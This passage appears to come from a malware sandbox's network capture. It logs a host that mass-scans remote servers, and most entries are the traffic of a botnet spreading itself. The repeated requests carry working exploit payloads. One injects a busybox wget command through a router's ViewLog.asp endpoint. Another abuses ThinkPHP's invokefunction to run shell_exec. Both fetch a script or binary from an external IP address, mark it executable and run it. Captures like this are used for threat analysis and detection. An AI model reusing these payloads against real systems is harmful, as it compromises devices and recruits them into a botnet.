2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
660	192.168.2.23	56786	94.122.218.97	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.904891968 CET	13232	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
661	192.168.2.23	56556	31.200.63.33	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.905299902 CET	13233	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
662	192.168.2.23	48438	62.29.46.201	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.908761024 CET	13234	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
663	192.168.2.23	36332	94.120.223.207	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.908874989 CET	13235	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
664	192.168.2.23	35772	31.47.117.75	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.914494038 CET	13235	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:39.148528099 CET	13263	IN	HTTP/1.0 200 OK Server: httpd/2.0 Date: Wed, 22 Nov 2023 07:45:32 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 3f 65 72 72 6f 72 5f 73 74 61 74 75 73 3d 31 26 70 61 67 65 3d 69 6e 64 65 78 2e 61 73 70 26 6c 6f 63 6b 5f 74 69 6d 65 3d 30 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp?error_status=1&page=index.asp&lock_time=0';</script></HEAD></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
665	192.168.2.23	51538	112.217.155.82	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:39.354254961 CET	13299	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:40.932368994 CET	13425	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:41.236584902 CET	13502	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 345 Connection: close Date: Wed, 22 Nov 2023 07:39:40 GMT Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
666	192.168.2.23	36740	112.175.108.227	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:39.354424953 CET	13299	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:40.292567968 CET	13381	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:42.148221016 CET	13555	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:45.923644066 CET	14009	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:53.346693993 CET	14946	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:08.192523956 CET	16729	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:39.676166058 CET	19762	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
667	192.168.2.23	37790	112.213.35.79	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:39.354525089 CET	13300	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:40.932378054 CET	13425	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:41.236670017 CET	13502	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:41 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
668	192.168.2.23	58212	112.126.178.233	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:39.354619026 CET	13300	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:40.964342117 CET	13426	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:41.278605938 CET	13526	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:39:39 GMT Server: Apache Content-Length: 11 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
669	192.168.2.23	35790	31.47.117.75	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:40.077058077 CET	13317	IN	HTTP/1.0 400 Bad Request Server: httpd/2.0 Date: Wed, 22 Nov 2023 07:45:33 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
670	192.168.2.23	51406	112.171.17.75	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:40.648798943 CET	13419	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
671	192.168.2.23	36750	112.175.108.227	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:40.661314011 CET	13420	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:43.875930071 CET	13826	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:50.019125938 CET	14558	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:02.049434900 CET	16011	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
672	192.168.2.23	41168	112.127.51.183	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:40.672183990 CET	13421	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:40.983113050 CET	13427	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:39:41 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
673	192.168.2.23	35438	112.74.190.107	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:40.691804886 CET	13422	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:41.016195059 CET	13438	IN	HTTP/1.1 400 Bad Request Server: nginx/1.17.10 Date: Wed, 22 Nov 2023 07:39:40 GMT Content-Type: text/html Content-Length: 158 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 37 2e 31 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.17.10</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
674	192.168.2.23	34196	95.101.95.27	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:40.881181955 CET	13424	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:41.113532066 CET	13439	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:39:40 GMT Date: Wed, 22 Nov 2023 07:39:40 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 32 66 62 64 32 31 37 26 23 34 36 3b 31 37 30 30 36 33 38 37 38 30 26 23 34 36 3b 62 31 31 63 61 65 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.22fbd217.1700638780.b11cae7</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
675	192.168.2.23	33066	95.58.65.29	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:41.213175058 CET	13501	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:41.545500994 CET	13540	IN	HTTP/1.1 200 OK
Nov 22, 2023 08:39:41.545552969 CET	13540	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
676	192.168.2.23	41274	112.126.228.248	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:42.876549006 CET	13655	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
